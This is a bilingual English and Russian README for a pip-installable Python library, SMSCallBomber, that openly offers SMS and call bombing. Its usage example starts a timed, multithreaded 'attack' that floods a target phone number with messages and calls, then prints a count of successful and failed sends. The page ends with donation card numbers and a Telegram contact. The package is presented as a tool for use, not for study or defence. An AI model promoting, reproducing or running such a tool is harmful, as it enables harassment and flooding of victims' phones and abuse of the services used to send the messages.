# SMSCallBomber

## English

### Description

This library provides functionality for SMS and call bombing.

### Installation

You can install the SMSCallBomber library via pip:

```bash
pip install SMSCallBomber
```

### Usage

```python
from smscallbomber import SMSCallBomber
import time
from argparse import Namespace

# Creating an instance of SMSCallBomber
args = Namespace(country='Two letter country code (Specify ALL for all countries)', phone=Phone number for attack (without +), time=Attack time in seconds, threads=Number of threads, timeout=Request timeout)
args.time += time.time()
t = SMSCallBomber(args)

# Starting the attack
t.start()

# Stopping the attack
t.stop()
time.sleep(10) # Increase the time if the results contain zeros
successful, failed = t.send_report()
print(f"Successfully sent (Not everyone can get there!): {successful}")
print(f"Failed to send: {failed}")

# Returns the result of the attack after it ends
time.sleep(args.time)
time.sleep(10) # Increase the time if the results contain zeros
successful, failed = t.send_report()
print(f"Successfully sent (Not everyone can get there!): {successful}")
print(f"Failed to send: {failed}")
```

### Donation

If you find this project helpful and would like to support its development, you can make a donation to the author.

- SBP, Sberbank, Tinkoff: +79024314981
- YooMoney: 4100118510603906
- Cards:
  - 2200 7009 6755 8080 - Tinkoff
  - 2202 2068 1279 8101 - Sberbank
- Other methods: [t.me/BabayVadimovich](https://t.me/BabayVadimovich)

### License

This project is licensed under the MIT License.

## Русский

### Описание

Эта библиотека предоставляет функционал для SMS бомбера со звонками.

### Установка

Вы можете установить библиотеку SMSCallBomber с помощью pip:

```bash
pip install SMSCallBomber
```

### Использование

```python
from smscallbomber import SMSCallBomber
import time
from argparse import Namespace

# Создание экземпляра SMSCallBomber
args = Namespace(country='Двухбуквенный код страны (Укажите ALL для всех стран)', phone=Номер телефона для атаки (без +), time=Время атаки в секундах, threads=Количество потоков, timeout=Время ожидания запроса)
args.time += time.time()
t = SMSCallBomber(args)

# Запуск атаки
t.start()

# Остановка атаки
t.stop()
time.sleep(10) # Увеличьте время если в результатах по нулям
successful, failed = t.send_report()
print(f"Успешно отправлено(Дойти могут не все!): {successful}")
print(f"Не удалось отправить: {failed}")

# Возвращает результат атаки после её окончания
time.sleep(args.time)
time.sleep(10) # Увеличьте время если в результатах по нулям
successful, failed = t.send_report()
print(f"Успешно отправлено(Дойти могут не все!): {successful}")
print(f"Не удалось отправить: {failed}")
```

### Пожертвование

Если вы нашли этот проект полезным и хотели бы поддержать его развитие, вы можете сделать пожертвование автору.

- СБП, Сбербанк, Тинькофф: +79024314981
- ЮMoney: 4100118510603906
- Карты:
  - 2200 7009 6755 8080 - Тинькофф
  - 2202 2068 1279 8101 - Сбербанк
- Другие способы: [t.me/BabayVadimovich](https://t.me/BabayVadimovich)

### Лицензия

Этот проект распространяется под лицензией MIT License.